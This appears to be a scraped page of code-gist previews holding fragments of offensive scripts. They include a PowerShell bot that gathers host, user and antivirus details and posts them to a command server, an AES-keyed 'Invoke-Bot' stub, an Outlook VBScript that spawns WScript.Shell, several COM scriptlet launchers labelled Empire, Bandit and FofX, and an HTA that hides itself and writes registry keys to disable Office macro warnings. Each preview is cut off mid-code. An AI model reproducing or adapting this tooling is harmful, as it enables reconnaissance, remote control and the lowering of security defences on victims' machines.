This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| $spl = 'BC_SPL';$vn = 'BC_Vic';$wTime = 1500;[System.Net.HttpWebRequest]$Req;function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi.replace('Microsoft Windows','Win') + ' SP' + (Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$u = $vn + '_' + $HWD + $spl + $mch + ' \ ' + $usr + $spl + $wi + $spl + $spl + 'PS1 0.1' + $spl + $av + $spl;return $u} catch {Start-Sleep -m $wTime}};function post ($cmdv, $v) { try { $Req = [System.Net.HttpWebRequest]::Create('http://127.0.0.1:1993/' + $cmdv);$Req.Method = 'POST';$Req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req.GetRequestStream();$buffer = [System.Text.Encoding]::UTF8.GetBytes([ |
| Function Invoke-DBC2{ | |
| Function Invoke-Bot{ | |
| $Global:secretIV = "Key@123Key@123fd" | |
| $Global:SecretKey = "secret#456!23key" | |
| Function Aes-Decrypt($DecryptData){ | |
| #Use the AES cipher and represent it as an object. |
| <html> | |
| <head> | |
| <meta http-equiv="Content-Language" content="en-us"> | |
| <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | |
| <title>Outlook</title> | |
| <script id=clientEventHandlersVBS language=vbscript> | |
| <!-- | |
| Sub window_onload() | |
| Set Application = ViewCtl1.OutlookApplication | |
| Set cmd = Application.CreateObject("Wscript.Shell") |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
| <html> | |
| <body> | |
| <script type="text/vbscript"> | |
| Window.ReSizeTo 0, 0 | |
| Window.moveTo -2000,-2000 | |
| Set wso = CreateObject("WScript.Shell") | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD" |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="WzVQ" | |
| progid="WzVQ" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |